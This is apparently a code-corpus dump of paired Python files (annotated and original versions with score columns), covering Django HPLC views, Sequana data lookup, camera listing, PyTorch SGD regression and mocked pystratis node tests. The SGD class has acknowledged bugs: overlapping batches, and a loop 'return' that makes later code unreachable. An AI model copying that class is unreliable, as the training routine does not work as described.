    """Render the overview page for the logged-in user's chromatograms only.

    Same annotation and template as :func:`index`, filtered to
    ``request.user``.
    """
    chromatograms = Chromatogram.objects.all().filter(User=request.user).order_by("-Datetime")
    for i in chromatograms:
        # exists() lets the database stop at the first matching row instead
        # of counting all of them (same truth value as count() > 0).
        i.data = HplcData.objects.filter(Chromatogram=i).exists()
    return render(request, "index.html", {
        "chromatograms": chromatograms,
        "active": MicroControllerManager.getinstance().getactivechromatogramids()
    })
| <filename>JuHPLC/views.py
from JuHPLC.Views.NewChromatogram import *
from JuHPLC.SerialCommunication.MicroControllerManager import MicroControllerManager
# Create your views here.
def index(request):
chromatograms = Chromatogram.objects.all().order_by("-Datetime")
for i in chromatograms:
i.data = HplcData.objects.filter(Chromatogram=i).count()>0
return render(request, "index.html", {
"chromatograms": chromatograms,
"active": MicroControllerManager.getinstance().getactivechromatogramids()
})
def mychromatograms(request):
chromatograms = Chromatogram.objects.all().filter(User=request.user).order_by("-Datetime")
for i in chromatograms:
i.data = HplcData.objects.filter(Chromatogram=i).count()>0
return render(request, "index.html", {
"chromatograms": chromatograms,
"active": MicroControllerManager.getinstance().getactivechromatogramids()
})
| it | 0.246747 | 2.294784 | 2 |
sequana/datatools.py | vladsaveliev/sequana | 0 | 13560 | # -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016 - Sequana Development Team
#
# File author(s):
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>,
# <<EMAIL>>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
"""Retrieve data from sequana library"""
import os
import easydev
import glob
import collections
def sequana_data(filename=None, where=None):
    """Return full path of a sequana resource data file.

    :param str filename: a valid filename to be found
    :param str where: one of the registered data directory (see below)
    :return: the path of file. See also here below in the case where
        filename is set to "*".

    .. code-block:: python

        from sequana import sequana_data
        filename = sequana_data("test.bam")

    Type the function name with "*" parameter to get a list of
    available files. Withe where argument set, the function returns a
    list of files. Without the where argument, a dictionary is returned where
    keys correspond to the registered directories::

        filenames = sequana_data("*", where="images")

    Registered directories are:

        - data
        - testing
        - data/adapters
        - images
        - scripts

    .. note:: this does not handle wildcards. The * means retrieve all files.
    """
    # Root of the resource directories bundled with the installed package.
    sequana_path = easydev.get_package_location('sequana')
    sharedir = os.sep.join([sequana_path , "sequana", 'resources'])

    directories = ['data', 'testing', 'data/adapters', 'images', 'scripts']

    # Case 1: "*" — list every resource file, either for one directory
    # (when `where` is given, returns a list) or for all of them (returns a
    # dict keyed by directory name).
    if filename == "*":
        found = collections.defaultdict(list)
        if where is not None:
            directories = [where]
        for thisdir in directories:
            for filename in glob.glob(sharedir + "/%s/*" % thisdir):
                filename = os.path.split(filename)[1]
                # Skip compiled/python bookkeeping files.
                to_ignore = ["__init__.py", "__pycache__"]
                if filename.endswith('.pyc') or filename in to_ignore:
                    pass
                else:
                    found[thisdir].append(os.path.split(filename)[1])
        if where is not None:
            return found[where]
        return found

    # Case 2: no filename — print the available files for the user and fail.
    if filename is None:
        for thisdir in directories:
            print('From %s directory:' % thisdir)
            for filename in glob.glob(sharedir + "/%s/*" % thisdir):
                filename = os.path.split(filename)[1]
                to_ignore = ["__init__.py", "__pycache__"]
                if filename.endswith('.pyc') or filename in to_ignore:
                    pass
                else:
                    print(' - sequana("%s", "%s")' % (os.path.split(filename)[1], thisdir))
        raise ValueError("Choose a valid file from the list above")

    # Case 3: a concrete filename.
    # in the code one may use / or \
    if where:
        # Directory given explicitly: build the path without checking existence.
        filename = os.sep.join([sharedir, where, filename])
    else:
        def _get_valid_file(filename, directory):
            # Return the full path if the file exists in `directory`, else False.
            filename = os.sep.join([sharedir, directory, filename])
            if os.path.exists(filename) is False:
                return False
            else:
                return filename

        # try to introspect the different directories
        # return filename if found otherwise raise error
        for thisdir in directories:
            if _get_valid_file(filename, thisdir):
                return _get_valid_file(filename, thisdir)
        raise Exception("unknown file %s. Type sequana_data() to get a list of valid names" % filename)

    return filename
| # -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016 - Sequana Development Team
#
# File author(s):
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>,
# <<EMAIL>>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
"""Retrieve data from sequana library"""
import os
import easydev
import glob
import collections
def sequana_data(filename=None, where=None):
"""Return full path of a sequana resource data file.
:param str filename: a valid filename to be found
:param str where: one of the registered data directory (see below)
:return: the path of file. See also here below in the case where
filename is set to "*".
.. code-block:: python
from sequana import sequana_data
filename = sequana_data("test.bam")
Type the function name with "*" parameter to get a list of
available files. Withe where argument set, the function returns a
list of files. Without the where argument, a dictionary is returned where
keys correspond to the registered directories::
filenames = sequana_data("*", where="images")
Registered directories are:
- data
- testing
- data/adapters
- images
.. note:: this does not handle wildcards. The * means retrieve all files.
"""
sequana_path = easydev.get_package_location('sequana')
sharedir = os.sep.join([sequana_path , "sequana", 'resources'])
directories = ['data', 'testing', 'data/adapters', 'images', 'scripts']
if filename == "*":
found = collections.defaultdict(list)
if where is not None:
directories = [where]
for thisdir in directories:
for filename in glob.glob(sharedir + "/%s/*" % thisdir):
filename = os.path.split(filename)[1]
to_ignore = ["__init__.py", "__pycache__"]
if filename.endswith('.pyc') or filename in to_ignore:
pass
else:
found[thisdir].append(os.path.split(filename)[1])
if where is not None:
return found[where]
return found
if filename is None:
for thisdir in directories:
print('From %s directory:' % thisdir)
for filename in glob.glob(sharedir + "/%s/*" % thisdir):
filename = os.path.split(filename)[1]
to_ignore = ["__init__.py", "__pycache__"]
if filename.endswith('.pyc') or filename in to_ignore:
pass
else:
print(' - sequana("%s", "%s")' % (os.path.split(filename)[1], thisdir))
raise ValueError("Choose a valid file from the list above")
# in the code one may use / or \
if where:
filename = os.sep.join([sharedir, where, filename])
else:
def _get_valid_file(filename, directory):
filename = os.sep.join([sharedir, directory, filename])
if os.path.exists(filename) is False:
return False
else:
return filename
# try to introspect the different directories
# return filename if found otherwise raise error
for thisdir in directories:
if _get_valid_file(filename, thisdir):
return _get_valid_file(filename, thisdir)
raise Exception("unknown file %s. Type sequana_data() to get a list of valid names" % filename)
return filename
| it | 0.181371 | 2.584488 | 3 |
example/models.py | nim65s/django-jugemaj | 0 | 13561 | <filename>example/models.py
"""Django models for the example app."""
from django.db import models
from wikidata.client import Client # type: ignore
LANGS = ["fr", "en"] # ordered list of langages to check on wikidata
class WikiDataModel(models.Model):
    """A django model to represent something available on wikidata."""

    # Human-readable label, cached locally from wikidata (see update_name).
    name = models.CharField(max_length=50)
    # Numeric part of the wikidata item id (the N in "QN").
    wikidata = models.PositiveIntegerField()

    def __str__(self):
        """Get the name of this wikidata instance."""
        return self.name

    @property
    def wikidata_url(self):
        """Get a direct link to the wikidata item."""
        return f"https://www.wikidata.org/wiki/Q{self.wikidata}"

    def update_name(self):
        """Update the name from wikidata."""
        labels = Client().get(f"Q{self.wikidata}", load=True).data["labels"]
        # Pick the first language from LANGS for which wikidata has a label.
        # NOTE(review): raises StopIteration if none of LANGS is present —
        # confirm whether a fallback (e.g. any available label) is needed.
        self.name = next(labels[lang] for lang in LANGS if lang in labels)["value"]
        self.save()
| <filename>example/models.py
"""Django models for the example app."""
from django.db import models
from wikidata.client import Client # type: ignore
LANGS = ["fr", "en"] # ordered list of langages to check on wikidata
class WikiDataModel(models.Model):
"""A django model to represent something available on wikidata."""
name = models.CharField(max_length=50)
wikidata = models.PositiveIntegerField()
def __str__(self):
"""Get the name of this wikidata instance."""
return self.name
@property
def wikidata_url(self):
"""Get a direct link to the wikidata item."""
return f"https://www.wikidata.org/wiki/Q{self.wikidata}"
def update_name(self):
"""Update the name from wikidata."""
labels = Client().get(f"Q{self.wikidata}", load=True).data["labels"]
self.name = next(labels[lang] for lang in LANGS if lang in labels)["value"]
self.save()
| pt | 0.198589 | 3.101345 | 3 |
build_tests/python_opencv.py | AustinSchuh/971-Robot-Code | 39 | 13562 | #!/usr/bin/python3
import cv2
if __name__ == '__main__':
cv2.SIFT_create()
| #!/usr/bin/python3
import cv2
if __name__ == '__main__':
cv2.SIFT_create()
| es | 0.214061 | 1.341454 | 1 |
tests/pytorch_pfn_extras_tests/training_tests/extensions_tests/test_print_report_notebook.py | yasuyuky/pytorch-pfn-extras | 243 | 13563 | import io
import pytest
import pytorch_pfn_extras as ppe
from pytorch_pfn_extras.training.extensions import _ipython_module_available
from pytorch_pfn_extras.training.extensions.log_report import _pandas_available
@pytest.mark.skipif(
    not _ipython_module_available or not _pandas_available,
    reason="print report notebook import failed, "
    "maybe ipython is not installed"
)
def test_run_print_report_notebook():
    # Smoke test: run a small training loop with PrintReportNotebook attached
    # and check that it completes without raising.  Output values are not
    # verified (see the comment in the loop body).
    max_epochs = 5
    iters_per_epoch = 5
    manager = ppe.training.ExtensionsManager(
        {}, {}, max_epochs, iters_per_epoch=iters_per_epoch)

    # Capture the notebook output in memory instead of a real display.
    out = io.StringIO()
    log_report = ppe.training.extensions.LogReport()
    manager.extend(log_report)
    extension = ppe.training.extensions.PrintReportNotebook(out=out)
    manager.extend(extension)

    for _ in range(max_epochs):
        for _ in range(iters_per_epoch):
            with manager.run_iteration():
                # Only test it runs without fail
                # The value is not tested now...
                pass
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
| import io
import pytest
import pytorch_pfn_extras as ppe
from pytorch_pfn_extras.training.extensions import _ipython_module_available
from pytorch_pfn_extras.training.extensions.log_report import _pandas_available
@pytest.mark.skipif(
not _ipython_module_available or not _pandas_available,
reason="print report notebook import failed, "
"maybe ipython is not installed"
)
def test_run_print_report_notebook():
max_epochs = 5
iters_per_epoch = 5
manager = ppe.training.ExtensionsManager(
{}, {}, max_epochs, iters_per_epoch=iters_per_epoch)
out = io.StringIO()
log_report = ppe.training.extensions.LogReport()
manager.extend(log_report)
extension = ppe.training.extensions.PrintReportNotebook(out=out)
manager.extend(extension)
for _ in range(max_epochs):
for _ in range(iters_per_epoch):
with manager.run_iteration():
# Only test it runs without fail
# The value is not tested now...
pass
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
| pt | 0.138669 | 2.198257 | 2 |
examples/python/00-list-devices.py | vishal-prgmr/tiscamera | 0 | 13564 | #!/usr/bin/env python3
# Copyright 2017 The Imaging Source Europe GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example will show you how to list information about the available devices
#
import sys
import gi
gi.require_version("Tcam", "0.1")
gi.require_version("Gst", "1.0")
from gi.repository import Tcam, Gst
def list_devices():
    """
    Print information about all available devices
    """
    source = Gst.ElementFactory.make("tcambin")

    for serial in source.get_device_serials():
        # get_device_info returns a tuple:
        # (success, model name, backend identifier, connection type).
        # Connection types are currently 'aravis', 'v4l2', 'libusb'
        # or 'unknown'.
        (return_value, model,
         identifier, connection_type) = source.get_device_info(serial)

        # success would be False only for a non-existent serial; since the
        # serial came from get_device_serials() this should not happen.
        if return_value:
            print("Model: {} Serial: {} Type: {}".format(model,
                                                         serial,
                                                         connection_type))
if __name__ == "__main__":
Gst.init(sys.argv) # init gstreamer
list_devices()
| #!/usr/bin/env python3
# Copyright 2017 The Imaging Source Europe GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example will show you how to list information about the available devices
#
import sys
import gi
gi.require_version("Tcam", "0.1")
gi.require_version("Gst", "1.0")
from gi.repository import Tcam, Gst
def list_devices():
"""
Print information about all available devices
"""
source = Gst.ElementFactory.make("tcambin")
serials = source.get_device_serials()
for single_serial in serials:
# This returns someting like:
# (True,
# name='DFK Z12GP031',
# identifier='The Imaging Source Europe GmbH-11410533',
# connection_type='aravis')
# The identifier is the name given by the backend
# The connection_type identifies the backend that is used.
# Currently 'aravis', 'v4l2', 'libusb' and 'unknown' exist
(return_value, model,
identifier, connection_type) = source.get_device_info(single_serial)
# return value would be False when a non-existant serial is used
# since we are iterating get_device_serials this should not happen
if return_value:
print("Model: {} Serial: {} Type: {}".format(model,
single_serial,
connection_type))
if __name__ == "__main__":
Gst.init(sys.argv) # init gstreamer
list_devices()
| pt | 0.161491 | 2.394649 | 2 |
regression/sgd.py | sahitpj/MachineLearning | 2 | 13565 | from .linear_torch import TorchGradientDescentAutogradRegression
import torch, math, random
class stochasticGradientDescent(TorchGradientDescentAutogradRegression):
    """Mini-batch stochastic gradient descent for linear regression.

    Each epoch shuffles the sample indices, slices them into batches and
    performs one autograd-based parameter update per batch.  Written for
    Python 2 (``xrange``, integer division, ``random.shuffle`` on a range).
    """

    def __init__(self, X, Y, alpha, **kwargs):
        # alpha is the learning rate; optional kwargs: batch_size, epochs_no.
        super(stochasticGradientDescent, self).__init__(X, Y, alpha, **kwargs)
        try:
            h = kwargs['batch_size']
            self.iterations = int(self.Y.shape[0])/h
            self.batch_size = int(self.Y.shape[0])/self.iterations
        except:
            # NOTE(review): bare except also hides non-KeyError failures.
            # Default: one sample per batch (pure SGD).
            self.iterations = int(self.Y.shape[0])
            self.batch_size = 1
        try:
            self.epochs_no = kwargs['epochs_no']
        except:
            self.epochs_no = 1
        self.batches = None  # filled by assign_batchs() at the start of each epoch

    def assign_batchs(self):
        """Shuffle sample indices and build the per-epoch batch index lists.

        NOTE(review): the slices use ``r[i:i+self.batch_size]`` with ``i``
        stepping by 1, so consecutive batches overlap rather than partition
        the data — confirm whether ``r[i*batch_size:(i+1)*batch_size]`` was
        intended.
        """
        r = range(int(self.Y.shape[0]))
        random.shuffle(r, random.random)
        batches = list()
        for i in xrange(self.iterations):
            batches.append(r[i:i+self.batch_size])
        self.batches = batches
        return batches

    def ForwardFunction(self, i):
        """Mean-squared-error loss of batch ``i`` under the current theta."""
        X = self.X[self.batches[i]]
        Y = self.Y[self.batches[i]]
        p = torch.mean((Y-X.mm(self.theta.double()))**2) #Loss function forward function
        self.objective = p
        return p

    def get_grads(self, i):
        """Compute gradients of the batch-``i`` loss w.r.t. theta via autograd."""
        self.initialise_theta()
        k = self.ForwardFunction(i)
        self.objective.backward()
        self.gradients = self.theta.grad
        return self.gradients

    def epoch(self):
        """Run one pass over all batches, updating theta after each one."""
        for i in xrange(self.iterations):
            self.update_theta(i)
        return self.theta

    def update_theta(self, i):
        """One gradient-descent step on batch ``i``."""
        h = self.get_grads(i)
        current_theta = self.theta.clone() #cloing theta so that we don't update in-place values
        current_theta -= self.gradients*self.alpha
        self.theta = current_theta
        return current_theta

    def train(self):
        """Train for ``epochs_no`` epochs and return the learned parameters.

        NOTE(review): the ``return theta`` inside the loop makes the MSE
        check and every line after it unreachable, and stops training after
        a single epoch — almost certainly misplaced.
        """
        self.initialise_theta()
        error = 0.0001
        for i in xrange(self.epochs_no):
            self.assign_batchs()
            print('')
            theta = self.epoch().double()
            print('Epoch - '+ str(i+1))
            print('')
            return theta
            print(self.MSE(theta))
            if self.MSE(theta) <= error:
                break
        print('### Training complete')
import torch, math, random
class stochasticGradientDescent(TorchGradientDescentAutogradRegression):
def __init__(self, X, Y, alpha, **kwargs):
super(stochasticGradientDescent, self).__init__(X, Y, alpha, **kwargs)
try:
h = kwargs['batch_size']
self.iterations = int(self.Y.shape[0])/h
self.batch_size = int(self.Y.shape[0])/self.iterations
except:
self.iterations = int(self.Y.shape[0])
self.batch_size = 1
try:
self.epochs_no = kwargs['epochs_no']
except:
self.epochs_no = 1
self.batches = None
def assign_batchs(self):
r = range(int(self.Y.shape[0]))
random.shuffle(r, random.random)
batches = list()
for i in xrange(self.iterations):
batches.append(r[i:i+self.batch_size])
self.batches = batches
return batches
def ForwardFunction(self, i):
X = self.X[self.batches[i]]
Y = self.Y[self.batches[i]]
p = torch.mean((Y-X.mm(self.theta.double()))**2) #Loss function forward function
self.objective = p
return p
def get_grads(self, i):
self.initialise_theta()
k = self.ForwardFunction(i)
self.objective.backward()
self.gradients = self.theta.grad
return self.gradients
def epoch(self):
for i in xrange(self.iterations):
self.update_theta(i)
return self.theta
def update_theta(self, i):
h = self.get_grads(i)
current_theta = self.theta.clone() #cloing theta so that we don't update in-place values
current_theta -= self.gradients*self.alpha
self.theta = current_theta
return current_theta
def train(self):
self.initialise_theta()
error = 0.0001
for i in xrange(self.epochs_no):
self.assign_batchs()
print('')
theta = self.epoch().double()
print('Epoch - '+ str(i+1))
print('')
return theta
print(self.MSE(theta))
if self.MSE(theta) <= error:
break
print('### Training complete') | pt | 0.154053 | 2.584562 | 3 |
pystratis/api/node/tests/test_node.py | TjadenFroyda/pyStratis | 8 | 13566 | import pytest
import ast
from pytest_mock import MockerFixture
from pystratis.api.node import Node
from pystratis.api.node.responsemodels import *
from pystratis.api import FullNodeState, FeatureInitializationState, LogRule
from pystratis.core.networks import StraxMain, CirrusMain
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_no_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=False)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=True)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_blockheader(mocker: MockerFixture, network, generate_uint256):
data = {
'version': 1,
'merkleroot': generate_uint256,
'nonce': 0,
'bits': 'bits',
'previousblockhash': generate_uint256,
'time': 1,
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_blockheader(
block_hash=generate_uint256,
is_json_format=True
)
assert response == BlockHeaderModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_verbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=True)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_nonverbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'get', return_value=hexified_data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=False)
assert response == hexified_data
unserialized_response = ast.literal_eval(bytes.fromhex(hexified_data).decode('ascii'))
assert data == unserialized_response
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_decode_raw_transaction(mocker: MockerFixture, network, generate_uint256, generate_coinbase_transaction):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.decode_raw_transaction(raw_hex=hexified_data)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_validate_address(mocker: MockerFixture, network, generate_p2pkh_address):
address = generate_p2pkh_address(network=network)
data = {
'isvalid': True,
'address': address,
'scriptPubKey': 'a scriptPubKey',
'isscript': False,
'iswitness': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.validate_address(address=address)
assert response == ValidateAddressModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout(mocker: MockerFixture, network, generate_uint256, generate_hexstring, generate_p2pkh_address):
data = {
'bestblock': generate_uint256,
'confirmations': 1,
'value': 5,
'scriptPubKey': {
'asm': generate_hexstring(128),
'hex': generate_hexstring(128),
'type': 'pubkey',
'reqSigs': 1,
"addresses": [
generate_p2pkh_address(network=network)
]
},
'coinbase': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout(trxid=generate_uint256, vout=0, include_mempool=False)
assert response == GetTxOutModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout_proof(mocker: MockerFixture, network, generate_uint256, generate_hexstring):
data = generate_hexstring(128)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout_proof(
txids=[
generate_uint256,
generate_uint256
],
block_hash=generate_uint256
)
assert response == data
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_shutdown(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.shutdown()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_stop(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.stop()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_levels(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.log_levels(log_rules=[LogRule(rule_name='TestRule', log_level='Debug', filename='filename')])
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_rules(mocker: MockerFixture, network):
data = [
{
'ruleName': 'TestRule',
'logLevel': 'Debug',
'filename': 'filename'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.log_rules()
assert response == [LogRule(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_async_loops(mocker: MockerFixture, network):
data = [
{
'loopName': 'Loop1',
'status': 'Running'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.async_loops()
assert response == [AsyncLoopsModel(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_rewind(mocker: MockerFixture, network):
data = "Rewind flag set, please restart the node."
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.rewind(height=2)
assert isinstance(response, str)
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_delete_datafolder_chain(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'delete', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.delete_datafolder_chain()
# noinspection PyUnresolvedReferences
node.delete.assert_called_once()
| import pytest
import ast
from pytest_mock import MockerFixture
from pystratis.api.node import Node
from pystratis.api.node.responsemodels import *
from pystratis.api import FullNodeState, FeatureInitializationState, LogRule
from pystratis.core.networks import StraxMain, CirrusMain
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_no_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=False)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=True)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_blockheader(mocker: MockerFixture, network, generate_uint256):
data = {
'version': 1,
'merkleroot': generate_uint256,
'nonce': 0,
'bits': 'bits',
'previousblockhash': generate_uint256,
'time': 1,
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_blockheader(
block_hash=generate_uint256,
is_json_format=True
)
assert response == BlockHeaderModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
